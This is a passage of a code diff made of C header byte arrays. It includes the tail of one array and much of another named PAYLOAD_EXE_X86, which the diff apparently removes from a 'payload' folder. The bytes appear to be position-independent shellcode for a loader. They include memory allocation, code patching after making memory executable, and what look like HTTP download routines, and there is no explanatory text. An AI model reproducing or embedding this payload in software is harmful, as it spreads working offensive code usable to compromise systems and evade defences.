1290 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
1291 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1292 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1293 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8,
1294 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc,
1295 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
1296 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00,
1297 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b,
1298 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1299 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83,
1300 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc,
1301 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1302 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b,
1303 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45,
1304 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
1305 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
1306 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1307 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a,
1308 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca,
1309 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b,
1310 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1,
1311 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31,
1312 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48,
1313 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55,
1314 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48,
1315 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b,
1316 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b,
1317 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c,
1318 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0,
1319 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89,
1320 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55,
1321 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07,
1322 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca,
1323 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b,
1324 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89,
1325 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda,
1326 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42,
1327 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
1328 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c,
1329 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca,
1330 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00,
1331 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca,
1332 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8,
1333 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1334 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1335 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48,
1336 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9,
1337 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb,
1338 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1339 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54,
1340 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd,
1341 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
1342 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d,
1343 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45,
1344 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63,
1345 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48,
1346 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08,
1347 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8,
1348 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4,
1349 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b,
1350 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10,
1351 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d,
1352 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1353 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02,
1354 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5,
1355 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90,
1356 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
1357 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1358 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1359 0x00, 0x00, 0x00, 0x00};
1360
+0
-638
payload/payload_exe_x86.h
0
1 unsigned char PAYLOAD_EXE_X86[] = {
2 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff,
3 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57,
4 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77,
5 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00,
6 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6,
7 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02,
8 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a,
9 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00,
10 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20,
11 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00,
12 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00,
13 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8,
14 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00,
15 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4,
16 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00,
17 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00,
18 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76,
19 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46,
20 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39,
21 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00,
22 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34,
23 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76,
24 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76,
25 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00,
26 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00,
27 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30,
28 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a,
29 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00,
30 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c,
31 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01,
32 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74,
33 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08,
34 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04,
35 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00,
36 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74,
37 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f,
38 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75,
39 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c,
40 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8,
41 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44,
42 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d,
43 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb,
44 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34,
45 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00,
46 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24,
47 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b,
48 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07,
49 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00,
50 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4,
51 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83,
52 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44,
53 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
54 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10,
55 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85,
56 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04,
57 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b,
58 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
59 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37,
60 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04,
61 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01,
62 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00,
63 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a,
64 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed,
65 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
66 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72,
67 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08,
68 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf,
69 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00,
70 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
71 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00,
72 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17,
73 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
74 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12,
75 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8,
76 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03,
77 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9,
78 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
79 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b,
80 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24,
81 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0,
82 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56,
83 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc,
84 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c,
85 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50,
86 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d,
87 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33,
88 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b,
89 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
90 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74,
91 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00,
92 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee,
93 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b,
94 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31,
95 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8,
96 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c,
97 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2,
98 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
99 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3,
100 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00,
101 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56,
102 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff,
103 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
104 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53,
105 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
106 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00,
107 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
108 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
109 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40,
110 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
111 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
112 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc,
113 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
114 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00,
115 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
116 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15,
117 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
118 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
119 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
120 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51,
121 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00,
122 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9,
123 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00,
124 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa,
125 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14,
126 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18,
127 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84,
128 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e,
129 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50,
130 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24,
131 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d,
132 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8,
133 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a,
134 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
135 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8,
136 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3,
137 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
138 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
139 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59,
140 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c,
141 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74,
142 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00,
143 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74,
144 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84,
145 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01,
146 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44,
147 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10,
148 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4,
149 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56,
150 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0,
151 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
152 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01,
153 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56,
154 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f,
155 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84,
156 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f,
157 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d,
